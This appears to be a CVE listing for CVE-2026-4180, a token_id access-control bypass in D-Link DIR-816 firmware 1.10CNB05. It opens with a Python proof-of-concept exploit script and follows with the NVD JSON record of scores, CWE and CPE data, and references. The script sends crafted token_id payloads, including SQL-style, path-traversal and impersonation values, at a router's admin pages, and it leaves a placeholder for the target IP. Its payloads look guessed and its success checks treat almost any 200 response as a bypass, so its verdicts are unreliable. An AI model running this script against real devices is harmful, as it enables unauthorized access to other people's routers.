CVE-2026-4180

import requests # CVE-2026-4180 PoC - D-Link DIR-816 Token ID Bypass # Target: D-Link DIR-816 devices running firmware 1.10CNB05 def check_vulnerability(target_ip, target_port=80): """Check if target is vulnerable to CVE-2026-4180""" # Construct the vulnerable URL with manipulated token_id url = f"http://{target_ip}:{target_port}/redirect.asp" # Try to bypass access control with crafted token_id params = { 'token_id': 'admin', # Attempting to impersonate admin 'url': 'http://example.com' } try: response = requests.get(url, params=params, timeout=10) # Check for successful bypass indicators if response.status_code == 200: # Check response content for access control bypass signs if 'login' not in response.text.lower() or 'redirect' in response.text.lower(): return True, "Vulnerable - Access control bypassed" return False, "Not vulnerable or target not responding" except requests.exceptions.RequestException as e: return None, f"Error: {str(e)}" def exploit_token_id_injection(target_ip, target_port=80): """Exploit CVE-2026-4180 to gain unauthorized access""" url = f"http://{target_ip}:{target_port}/redirect.asp" # Payload variations for token_id manipulation payloads = [ {'token_id': '1 OR 1=1', 'url': '/admin/'}, {'token_id': '../../admin', 'url': '/admin/'}, {'token_id': 'admin', 'url': '/admin/'}, {'token_id': 'root', 'url': '/admin/'}, {'token_id': '{"admin": true}', 'url': '/admin/'} ] for payload in payloads: try: response = requests.get(url, params=payload, timeout=10) if response.status_code == 200 and len(response.content) > 0: print(f"[*] Payload: {payload}") print(f"[*] Response length: {len(response.content)}") print(f"[*] Status: Potential access granted\n") except requests.exceptions.RequestException: continue if __name__ == "__main__": target = "192.168.0.1" # Replace with target IP is_vuln, message = check_vulnerability(target) print(f"Vulnerability Check Result: {message}")

{"cve": {"id": "CVE-2026-4180", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:58.563", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in D-Link DIR-816 1.10CNB05. The impacted element is an unknown function of the file redirect.asp of the component goahead. The manipulation of the argument token_id leads to improper access controls. The attack may be initiated remotely. The exploit is publicly available and might be used. This vulnerability only affects products that are no longer supported by the maintainer."}, {"lang": "es", "value": "Una vulnerabilidad fue identificada en D-Link DIR-816 1.10CNB05. El elemento impactado es una función desconocida del archivo redirect.asp del componente goahead. La manipulación del argumento token_id conduce a controles de acceso inadecuados. El ataque puede ser iniciado remotamente. El exploit está disponible públicamente y podría ser usado. Esta vulnerabilidad solo afecta a productos que ya no son soportados por el mantenedor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-284"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-816_firmware:1.10cnb05:*:*:*:*:*:*:*", "matchCriteriaId": "6A221E99-E2B0-4C57-9263-9A86EFF8746E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-816:-:*:*:*:*:*:*:*", "matchCriteriaId": "B54058C1-B58F-434A-ABF0-A6B314A1AB14"}]}]}], "references": [{"url": "https://github.com/wudipjq/my_vuln/blob/main/D-Link7/vuln_84/84.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory" ... (truncated)